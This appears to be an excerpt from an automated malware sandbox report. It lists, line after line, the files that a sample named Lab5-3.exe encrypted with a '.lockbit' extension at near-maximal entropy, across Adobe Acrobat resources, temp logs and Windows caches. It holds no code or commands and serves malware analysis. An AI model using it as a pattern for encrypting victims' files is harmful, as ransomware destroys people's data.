                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\root\ui-strings.js.lockbit entropy: 7.99223696615Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\en-us\AcrobatDesktop_WN_ModernViewerMAC_20230621_AE_v02.png.lockbit entropy: 7.9987473304Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\ui-strings.js.lockbit entropy: 7.99337432765Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{E8B84CFB-B069-BC13-F88F-170904F645E5}.lockbit entropy: 7.99569238687Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ru-ru\ui-strings.js.lockbit entropy: 7.99563768364Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\pt-br\Q3_2022_payments.png.lockbit entropy: 7.9947864741Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\ui-strings.js.lockbit entropy: 7.99276448247Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pl-pl\ui-strings.js.lockbit entropy: 7.99443068827Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\ui-strings.js.lockbit entropy: 7.99408972499Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nl-nl\ui-strings.js.lockbit entropy: 7.9947380315Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-ae\ui-strings.js.lockbit entropy: 7.99274403415Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\en-us\Q3_2022_ExperienceStreamlinedAcrobat_Old_Reader.webm.lockbit entropy: 7.99893643614Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sl-si\ui-strings.js.lockbit entropy: 7.99447166169Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\uk-ua\ui-strings.js.lockbit entropy: 7.99645492349Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\whats_new\pt-br\Q3_2022_webform.png.lockbit entropy: 7.99478191819Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\da-dk\ui-strings.js.lockbit entropy: 7.993145501Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\it-it\ui-strings.js.lockbit entropy: 7.99314134699Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sl-si\ui-strings.js.lockbit entropy: 7.99336912609Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Sign White Paper.pdf.lockbit entropy: 7.99436011652Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\pt-br\ui-strings.js.lockbit entropy: 7.99448276249Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-tw\ui-strings.js.lockbit entropy: 7.99398553063Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ko-kr\ui-strings.js.lockbit entropy: 7.99388132088Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\zh-cn\ui-strings.js.lockbit entropy: 7.99489235366Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ro-ro\ui-strings.js.lockbit entropy: 7.99063167115Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fi-fi\ui-strings.js.lockbit entropy: 7.99424290682Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-fr\ui-strings.js.lockbit entropy: 7.99370534208Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\root\ui-strings.js.lockbit entropy: 7.9940580633Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\tr-tr\ui-strings.js.lockbit entropy: 7.99535238154Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sv-se\ui-strings.js.lockbit entropy: 7.99452829924Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\ui-strings.js.lockbit entropy: 7.99424765971Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\de-de\ui-strings.js.lockbit entropy: 7.99338044905Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ro-ro\ui-strings.js.lockbit entropy: 7.99498635531Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\eu-es\ui-strings.js.lockbit entropy: 7.99012464834Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\images\dc_review_upsell_2x.png.lockbit entropy: 7.99095270323Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\sv-se\ui-strings.js.lockbit entropy: 7.99350646971Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hu-hu\ui-strings.js.lockbit entropy: 7.99489843705Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\es-es\ui-strings.js.lockbit entropy: 7.99411533198Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ru-ru\ui-strings.js.lockbit entropy: 7.99665490519Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\fr-ma\ui-strings.js.lockbit entropy: 7.99349743951Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\css\main.css.lockbit entropy: 7.99534866429Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ja-jp\ui-strings.js.lockbit entropy: 7.99539467362Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\es-es\ui-strings.js.lockbit entropy: 7.99103527843Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\dc_review_upsell_2x.png.lockbit entropy: 7.99045531437Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\dc_share_upsell_2x.png.lockbit entropy: 7.99167479429Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\ui-strings.js.lockbit entropy: 7.99305512769Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ru-ru\ui-strings.js.lockbit entropy: 7.9926990754Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\ui-strings.js.lockbit entropy: 7.9934425309Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\images\dc_share_upsell_2x.png.lockbit entropy: 7.99218127359Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\cs-cz\ui-strings.js.lockbit entropy: 7.99296724243Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\adobeScanQRCode.png.lockbit entropy: 7.99897281454Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\en-us\NativeRS.webm.lockbit entropy: 7.99212429046Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Acrobat Pro DC.pdf.lockbit entropy: 7.99887460347Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\ui-strings.js.lockbit entropy: 7.99006317189Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\videos\whats_new\de-de\NativeRS.webm.lockbit entropy: 7.99280761731Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_cs_135x40.svg.lockbit entropy: 7.99153461387Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\uk-ua\ui-strings.js.lockbit entropy: 7.99615515064Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_nl_135x40.svg.lockbit entropy: 7.99184745839Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\adobeScanQRCode@2x.png.lockbit entropy: 7.99899922951Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\ui-strings.js.lockbit entropy: 7.99372328009Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fi_135x40.svg.lockbit entropy: 7.99075542927Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Adobe Cloud Services.pdf.lockbit entropy: 7.99106142428Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\ui-strings.js.lockbit entropy: 7.9925571216Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst.lockbit entropy: 7.99887874852Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheAcro65536.dat.lockbit entropy: 7.99926629287Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\css\main.css.lockbit entropy: 7.99683348352Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.lockbit entropy: 7.99022055199Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt.lockbit entropy: 7.99301104369Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1000.log.lockbit entropy: 7.99594853238Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-0929b.log.lockbit entropy: 7.99811513057Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1309.log.lockbit entropy: 7.99867196876Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258.log.lockbit entropy: 7.99516723478Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log.lockbit entropy: 7.99021139005Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-acro-en_us.gif.lockbit entropy: 7.99905753401Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\selector.js.lockbit entropy: 7.99181350568Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231003-1258c.log.lockbit entropy: 7.99820202781Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-0929a.log.lockbit entropy: 7.99737865832Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Chrome__crx_aghbiahbpaeidepookljebhfak.lockbit entropy: 7.99581260181Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\308046B0AF4A39CB.lockbit entropy: 7.99484255837Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1152.log.lockbit entropy: 7.99802199666Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1051a.log.lockbit entropy: 7.99789047295Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1152a.log.lockbit entropy: 7.99886623294Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1051.log.lockbit entropy: 7.99000329496Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\plugin.js.lockbit entropy: 7.9992290803Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\read_EX_Challenger_1_DT-2x.png.lockbit entropy: 7.99639169654Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.lockbit entropy: 7.99909097554Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.lockbit entropy: 7.99272991042Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1055.log.lockbit entropy: 7.99903295554Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1157.log.lockbit entropy: 7.99817033253Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Chrome__crx_agimnkijcamfeangaknmldooml.lockbit entropy: 7.99477586607Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1153.log.lockbit entropy: 7.99837879167Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\308046B0AF4A39CB;PrivateBrowsingAUMID.lockbit entropy: 7.99569249139Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\DESKTOP-AGET0TR-20231004-1051c.log.lockbit entropy: 7.99898941287Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Chrome.lockbit entropy: 7.99531924664Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\nls\de-de\ui-strings.js.lockbit entropy: 7.99163766797Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\nls\it-it\ui-strings.js.lockbit entropy: 7.99140812105Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\images\req_sign_ctip_gif.gif.lockbit entropy: 7.99093313676Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nb-no\ui-strings.js.lockbit entropy: 7.99125611304Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\req_sign_ctip_gif.gif.lockbit entropy: 7.99091547185Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\offline.lockbit entropy: 7.99186842062Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.lockbit entropy: 7.99904286705Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log.lockbit entropy: 7.99861988565Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\nls\da-dk\ui-strings.js.lockbit entropy: 7.99100657411Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\msedge_installer.log.lockbit entropy: 7.99106760798Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.lockbit entropy: 7.99895090135Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.lockbit entropy: 7.99882260983Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\ca-es\ui-strings.js.lockbit entropy: 7.99412686377Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Temp\tmp33E7.tmp.lockbit entropy: 7.99879187849Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\nls\es-es\ui-strings.js.lockbit entropy: 7.99270951535Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nl-nl\ui-strings.js.lockbit entropy: 7.99225903335Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\nls\pt-br\ui-strings.js.lockbit entropy: 7.99173316524Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf.lockbit entropy: 7.99896431834Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\CourierStd-Bold.otf.lockbit entropy: 7.99432604774Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\https___java_com_help.lockbit entropy: 7.99535770159Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{16988324-21C9-05B2-CA60-9B4EC72739D8}.lockbit entropy: 7.99555874194Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pt_135x40.svg.lockbit entropy: 7.99013028623Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\nls\sv-se\ui-strings.js.lockbit entropy: 7.99114919421Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\walk-through\js\nls\root\ui-strings.js.lockbit entropy: 7.99147218669Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_es_135x40.svg.lockbit entropy: 7.99351653644Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\reviews\js\nls\ko-kr\ui-strings.js.lockbit entropy: 7.99030080625Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_tr_135x40.svg.lockbit entropy: 7.99183551605Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_fr_135x40.svg.lockbit entropy: 7.99381298404Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\CourierStd.otf.lockbit entropy: 7.99417467076Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_nb_135x40.svg.lockbit entropy: 7.99293329667Jump to dropped file
